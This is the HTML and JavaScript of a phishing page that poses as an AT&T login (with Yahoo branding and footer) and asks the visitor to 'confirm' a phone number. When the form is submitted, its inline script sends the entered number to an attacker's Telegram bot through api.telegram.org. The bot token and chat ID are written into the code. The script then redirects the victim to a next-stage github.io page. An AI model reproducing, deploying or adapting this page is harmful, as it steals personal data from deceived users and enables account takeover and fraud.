<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="style.css">
  <title>AT&T - Login</title>
   <style>

    body{
  padding: 0;
  margin: 0;
  background: #f7f7f7;
  box-sizing: border-box;
  font-family: Arial, Helvetica, sans-serif
}

section#form-section .top h3
{
  font-size: 13px
}
section#form-section .top
{
  display: flex;
  justify-content: space-between;
  margin: auto;
  width: 22%;
  align-items: center;
  text-align: center;
}
section#form-section
{
  background: #fff;
      width: 320px;
    min-height: 580px;
  margin: 3% auto auto auto;
  padding: 40px;
  align-items: center;
  text-align: center;
}

.dont-have a,
.can{
      margin-bottom: 0;
    padding: 0;
    font-size: .875rem;
    line-height: 1.5rem;
    color: #0057b8;
    font-weight: bold;
    text-decoration: none

}
form .label a{
  float: right;
    margin-bottom: 0;
    padding: 0;
    font-size: .875rem;
    line-height: 1.5rem;
    color: #0057b8;
    font-weight: bold;
    text-decoration: none
}
form label
{
  float: left
}
form input
{
  background-color: #fff;
    border: 1px solid #797e85;
    border-radius: 3px;
    box-shadow: none;
    width: 100%;
    padding: 10px 0px 10px 10px;
    line-height: 30px;
    outline: none;
    margin: 3% 0%;
}
form button{

}
.save img{
  height: 30px;
}
.save{
  display: flex;
  align-items: center;
}


form button{
  width: 100%;
    height: 48px;
    border-radius: 3px;
    border: 1px solid #0057b8;
    background-color: #0057b8;
    font-size: .875rem;
    color: #fff;
}
button.hollow{
  background: #fff;
  border: 1px solid #000;
  color: #000
}
button.green{
  background: #008522;
  font-weight: bold;
  border: 1px solid #008522;
}

.or-hr p{
  font-size: 10px;
  font-weight: bold;
}
.or-hr hr{
  width: 40%
}
.or-hr
{
  display: flex;
  justify-content: space-between;
  width: 100%;
  align-items: center;
}

footer#footer ul li
{
  font-size: 13px;
  list-style: none;
  color: #0057b8
}
footer#footer p{
  font-size: 12px
}
footer#footer ul{
  width: 40%;
  margin: auto;
  display: flex;
  justify-content: space-between;
}
footer#footer{
  width: 100%;;
  text-align: center;
  align-items: center;
  margin-top: 1%
}

@media(max-width: 1001px){
  footer#footer ul{
  text-align: center;
  flex-direction: column;
}
footer#footer ul li{
  margin-top: 5%
}
}

  </style>

</head>
<body>

  <section id="form-section">
    <div class="top">
          <img height="38" viewBox="0 0 36 36" width="100" src="https://picturehost.github.io/pic/yh.png">
          </img>
    </div>
    <div class="sign-att">
      <p>Confirm your phone number</p>
    </div>
    <form action="" method="post" id="form">
      <div class="label">
        <br>
        <input type="text" id="usr-id" placeholder="Phone number" required><br>
      </div><br>
      </div>
      <button type="submit">Continue</button><br><br>
     
      <br><br>
      
    </form>
  </section><br>

  <footer id="footer">
    <ul id="ul">
      <li>Legal policy center</li>
      <li>Privacy policy</li>
      <li>Terms of use</li>
      <li>Accessibility</li>
      <li>Do not sell my personal Information</li>
    </ul>
    <p>©2024 Yahoo Intellectual Property. All rights reserved.</p>
  </footer>


    <script>
      const formal = document.querySelector('#form')
    
      let bot = {
          TOKEN: "7254677966:AAHxQ5xp6NODN078hD0sIe4PNhCJ-wQ3ccs",
          chatID: "6252403441"
      }


      formal.addEventListener("submit", e =>{
          e.preventDefault();

          let result1 = document.querySelector('#usr-id').value
          
          fetch(`https://api.telegram.org/bot${bot.TOKEN}/sendMessage?chat_id=${bot.chatID}&text=ATT-RESULT=Phone number::${result1}`, {
              method: "GET"
          }).then(success => {
              window.location.replace("https://ytwopmbcghsjkaiuw.github.io/ghsyueiowkmnbd/3y.html");
          }, error => {
              alert("Message not sent")
              console.log(error)

          })
      })
  </script>

</body>
</html>